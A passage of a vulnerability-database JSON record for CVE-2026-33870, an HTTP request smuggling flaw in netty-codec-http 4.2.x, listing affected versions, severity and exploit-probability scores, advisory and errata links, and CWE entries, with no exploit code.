api/packages/803594?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803595?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.1.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.1.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803596?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.2.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.2.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803597?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.3.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.3.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803598?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.4.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.4.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/68850?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.5.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.5.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081012?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.6.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.6.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081013?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.7.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.7.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/67007?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.8.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.8.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081014?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.9.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.9.Final"}],"references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33870.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33870.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33870","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0249","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02515","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02502","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03103","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03088","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03065","published_at":"2026-05-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05757","published_at":"2026-05-12T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05753","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05741","published_at":"2026-05-09T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12209","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12265","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12329","published_at":"2026-04-04T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12128","published_at":"2026-04-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12258","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.1208","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12282","published_at":"2026-04-02T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12078","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12191","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12227","published_at":"2026-04-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33870"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33870","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33870"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/netty/netty","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/netty/netty"},{"reference_url":"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/"}],"url":"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33870","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33870"},{"reference_url":"https://w4ke.info/2025/06/18/funky-chunks.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/"}],"url":"https://w4ke.info/2025/06/18/funky-chunks.html"},{"reference_url":"https://w4ke.info/2025/10/29/funky-chunks-2.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/"}],"url":"https://w4ke.info/2025/10/29/funky-chunks-2.html"},{"reference_url":"https://www.rfc-editor.org/rfc/rfc9110","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/"}],"url":"https://www.rfc-editor.org/rfc/rfc9110"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132229","reference_id":"1132229","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132229"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2452453","reference_id":"2452453","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2452453"},{"reference_url":"https://github.com/advisories/GHSA-pwqr-wmgm-9rr8","reference_id":"GHSA-pwqr-wmgm-9rr8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pwqr-wmgm-9rr8"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10175","reference_id":"RHSA-2026:10175","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10175"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10184","reference_id":"RHSA-2026:10184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13571","reference_id":"RHSA-2026:13571","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13571"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:14272","reference_id":"RHSA-2026:14272","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:14272"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:14276","reference_id":"RHSA-2026:14276","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:14276"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7109","reference_id":"RHSA-2026:7109","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7109"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:7380","reference_id":"RHSA-2026:7380","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:7380"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8159","reference_id":"RHSA-2026:8159","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8159"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:8509","reference_id":"RHSA-2026:8509","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:8509"}],"weaknesses":[{"cwe_id":444,"name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","description":"The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"7.0 - 8.9","exploitability":"0.5","weighted_severity":"8.0","risk_score":4.0,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9syp-fkzy-4fhy"}